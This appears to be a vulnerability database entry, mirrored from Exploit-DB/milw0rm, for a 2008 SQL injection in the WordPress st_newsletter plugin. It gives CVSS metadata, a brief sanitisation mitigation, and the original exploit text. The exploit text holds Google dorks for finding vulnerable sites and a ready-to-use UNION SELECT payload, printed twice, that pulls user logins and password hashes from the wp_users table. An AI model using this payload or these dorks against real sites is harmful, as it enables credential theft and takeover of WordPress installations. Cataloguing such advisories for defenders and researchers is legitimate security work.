Wordpress Plugin (st_newsletter) SQL Injection

vendor:

st_newsletter Plugin

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: st_newsletter Plugin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

WordPress Plugin (st_newsletter) SQL Injection

wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################################
#
#  Wordpress Plugin (st_newsletter) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"wp-content/plugins/st_newsletter"
#
# DORK 2 : allinurl :"shiftthis-preview.php"
#
##########################################################################
EXPLOIT :

wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users


##########################################################################
# S@BUN                   www.hackturkiye.com                  S@BUN
##########################################################################
# S@BUN                      GOOD LUCKY                          S@BUN
##########################################################################

# milw0rm.com [2008-02-03]